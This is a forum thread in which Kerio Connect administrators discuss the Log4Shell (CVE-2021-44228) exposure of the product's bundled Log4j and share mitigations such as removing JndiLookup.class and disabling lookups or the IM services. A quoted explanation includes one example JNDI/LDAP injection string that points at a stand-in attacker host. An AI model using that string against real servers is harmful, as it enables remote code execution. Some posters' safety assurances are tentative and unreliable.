GFI Forums: Kerio Connect » CVE-2021-44228 "Log4Shell"

Home » GFI User Forums » Kerio Connect » CVE-2021-44228 "Log4Shell"

Show: Today's Messages :: Show Polls :: Message Navigator
E-mail to friend

CVE-2021-44228 "Log4Shell" [message #150625]

Sat, 11 December 2021 09:00

nibs
Messages: 86
Registered: November 2007

Is there any word on whether Kerio Connect components are vulnerable to CVE-2021-44228 "Log4Shell" and if so what the mitigation is?

Report message to a moderator

Re: CVE-2021-44228 "Log4Shell" [message #150626 is a reply to message #150625]

Sat, 11 December 2021 10:25

PPG
Messages: 184
Registered: February 2010

Done some research. The Log4J bundled with KC 9.3.1P1 is version 2.5 (found in ..\MailServer\javaservices\im\lib

According to several internet sources the issue is fixed in Log4j version 2.15, so basically: yeah, it's a vulnerability!

Sources:
1. https://nakedsecurity.sophos.com/2021/12/10/log4shell-java-v ulnerability-how-to-safeguard-your-servers/
2. https://en.wikipedia.org/wiki/Log4j#Log4Shell_vulnerability

Would be interested to hear from GFI how to mitigate for as long as we have to wait for patches to address this.

[Updated on: Sat, 11 December 2021 10:27]

Report message to a moderator

Re: CVE-2021-44228 "Log4Shell" [message #150627 is a reply to message #150625]

Sat, 11 December 2021 13:35

james_bray
Messages: 5
Registered: August 2010

It would also be good to know if there are any mitigations we can apply now, prior to a patch. For instance, disabling any services or options that might rely on the log4j library.

Report message to a moderator

Re: CVE-2021-44228 "Log4Shell" [message #150628 is a reply to message #150626]

Sat, 11 December 2021 16:24

Backspin
Messages: 132
Registered: June 2008
Location: Amsterdam, the Netherland...

Interesting. I don't think Kerio uses Java for every service, I thought only for Full text search and IM. If you don't have these enabled, you could be safe from this.

Edit: If I understand the confusing Java naming well enough, then according to the kerio/mailserver/javaservices/jre/releases file, the version of java in at least Kerio Connect 9.2.12p1 and up is "1.8.0_222", which in Java-speak appears to be Java version 8u222.

On this page ( https://blog.qualys.com/vulnerabilities-threat-research/2021 /12/10/apache-log4j2-zero-day-exploited-in-the-wild-log4shel l) it says: "If the server has Java runtimes later than 8u121, then it is protected against remote code execution by defaulting "com.sun.jndi.rmi.object.trustURLCodebase" and "com.sun.jndi.cosnaming.object.trustURLCodebase" to "false""
But I'm not sure, since Kerio uses OpenJDK, and I don't know if the numbering is the same .

Backspin IT - http://www.backspin.nl

[Updated on: Sat, 11 December 2021 21:32]

Report message to a moderator

Re: CVE-2021-44228 "Log4Shell" [message #150631 is a reply to message #150628]

Sun, 12 December 2021 11:45

AndreasL
Messages: 126
Registered: July 2008
Location: Germany

Can I donwload a patched version and replace the 3 files (rename it) myself or have to wait for a patch from GFI?
\lib\log4j-api-2.5.jar
\lib\log4j-core-2.5.jar
\lib\log4j-slf4j-impl-2.5.jar

Is an update available soon from GFI?

[Updated on: Sun, 12 December 2021 12:06]

Report message to a moderator

Re: CVE-2021-44228 "Log4Shell" [message #150632 is a reply to message #150625]

Sun, 12 December 2021 18:33

edikonfetti
Messages: 2
Registered: December 2021

I deleted the JndiLookup class from log4j-core-2.5.jar until GFI releases an update. Haven't run into any issues yet. I took a backup of the original jar file, just in case.

Run with elevated privileges:

cd /opt/kerio/mailserver/javaservices/im/lib
systemctl stop kerio-connect.service
tar -cvzf log4j-core-2.5.jar-vulnerable.gz log4j-core-2.5.jar
zip -d log4j-core-2.5.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
systemctl start kerio-connect.service

Report message to a moderator

Re: CVE-2021-44228 "Log4Shell" [message #150633 is a reply to message #150631]

Mon, 13 December 2021 07:01

boisbleu
Messages: 62
Registered: May 2015

I dont't think so, that you can do it this way. There a 6 years of development between version 2.5 and 2.15

The question is: can the system infected using the default communication services of the mailserver?

So far I thought, the whole system is based on Java.

[Updated on: Mon, 13 December 2021 07:14]

Report message to a moderator

Re: CVE-2021-44228 "Log4Shell" [message #150634 is a reply to message #150626]

Mon, 13 December 2021 07:16

FEichelsdoerfer
Messages: 35
Registered: June 2015
Location: Germany

Hi, sorry, I did´nt get it.
When the Log4J bundled with KC 9.3.1P1 is version 2.5, and the issue is fixed with Version 2.15 (a lower version than 2.5?), why should there be a vulnerability?

Report message to a moderator

Re: CVE-2021-44228 "Log4Shell" [message #150635 is a reply to message #150634]

Mon, 13 December 2021 07:25

boisbleu
Messages: 62
Registered: May 2015

https://logging.apache.org/log4j/2.x/changes-report.html

And for our german speaking users:

Quote:

Das Problem entsteht, wenn ein Dienst ein Ereignis wie "Habe X getroffen" protokolliert. Im Java-Universum kommt dabei häufig die Bibliothek Log4j zum Einsatz. Und die schreibt das nicht nur weg; sie versucht, den Text X zu interpretieren. Und wenn der etwas wie

${jndi:ldap://boser.server.de/a}

enthält, dann knallt es. Der Dienst kontaktiert "boser.server.de", nimmt von diesem Java-Code entgegen und führt den aus. Ja, genau einfach so.

Quelle: https://www.heise.de/ratgeber/Schutz-vor-Log2j-Luecke-was-hi lft-jetzt-und-was-eher-nicht-6292961.html

[Updated on: Mon, 13 December 2021 07:39]

Report message to a moderator

Re: CVE-2021-44228 "Log4Shell" [message #150636 is a reply to message #150635]

Mon, 13 December 2021 07:29

frankdb
Messages: 2
Registered: February 2021

15 is higher than 5.

On the subject of kerio, the IM service definitely includes the library and the vulnerable class. If the numbering scheme is correct, as Backspin mentioned, the java version should prevent it from being exploited. I would still disable and turn off the IM service ( XMPP )

Report message to a moderator

Re: CVE-2021-44228 "Log4Shell" [message #150637 is a reply to message #150625]

Mon, 13 December 2021 07:52

tholud
Messages: 1
Registered: December 2021

not nice not getting a patch in time for a paid service.
jitsi has fixed it already two days ago.
but anyhow.
we fixed it by changing the configuration of mailserver.

go to your mailserver config file should be something like mailserver.cfg in folder /opt/kerio/mailserver

there you find several lines beinning with:

<variable name="JvmOptions""

if you don'T have options here replace this line by:

<variable name="JvmOptions">-Dlog4j2.formatMsgNoLookups=true</variable >

So this will prevent doing Lookups.

Very Important...before changing you have to stop the server, then change the file, then start the server again.
If you are not doing this way, changes will be dissmissed automatically.

Report message to a moderator

Re: CVE-2021-44228 "Log4Shell" [message #150638 is a reply to message #150635]

Mon, 13 December 2021 08:01

FEichelsdoerfer
Messages: 35
Registered: June 2015
Location: Germany

Dankeschön! Erschreckend. Etwas unglückliche Versionierung, meiner Meinung nach.

Report message to a moderator

Re: CVE-2021-44228 "Log4Shell" [message #150639 is a reply to message #150638]

Mon, 13 December 2021 08:14

boisbleu
Messages: 62
Registered: May 2015

Bei älteren Versionen empfehlen die Entwickler, als Mitigation die Klasse JndiLookup zu entfernen:

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.

Am besten auf ein anderes System kopieren und dann mit einem Packer die Klasse entfernen. Alte Datei umbenennen und neue rüberkopieren. Zur Sicherheit den Dienst neustarten.

---

If using older versions than 2.10 it's recommand to remove the class IndiLookup.

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.

Copy the file to another system, remove the class from the archive, rename the file on the server, copy the modified file to the server and restart the service.

[Updated on: Mon, 13 December 2021 08:19]

Report message to a moderator

Re: CVE-2021-44228 "Log4Shell" [message #150640 is a reply to message #150639]

Mon, 13 December 2021 09:20

AndreasL
Messages: 126
Registered: July 2008
Location: Germany

what happen if I delete/rename the 4 .jar files?

Report message to a moderator

Re: CVE-2021-44228 "Log4Shell" [message #150641 is a reply to message #150640]

Mon, 13 December 2021 09:35

atgfi
Messages: 1
Registered: December 2021

Hello,

you can try what opens log4j with following command on Linux:

lsof | grep log4j

next you try is:

ps auxxwww | greo java

You see its IM and XMPP.

Disable XMPP in webadmin tool off kerio connect.

restart kerio-connect

try again lsof | grep log4j

im is allways activ.

stop kerio-connect

change following settings in mailserver.cfg from 1 to 0:

<table name="InstantMessaging">
...
<variable name="Enabled">0</variable>
...
</table>

<table name="WebIM">
...
<variable name="Enabled">0</variable>
...
</table>

restart kerio-connect

test with lsof | grep log4j and ps -auxwww | grep java

there should no mor Java processes and maybe i think you are now safe.

sorry fro quick and dirty english but i#m really busy about log4j at this time.

Report message to a moderator

Pages (3): [1 2 3 › »]

Previous Topic:	Errors in Kerio Connect 9.3.1p2
Next Topic:	GFI. Stop that!

Goto Forum:

-=] Back to Top [=-

[ Syndicate this forum (XML) ] [

] [

]

Current Time: Tue Jun 06 05:04:13 CEST 2023

Total time taken to generate the page: 0.02276 seconds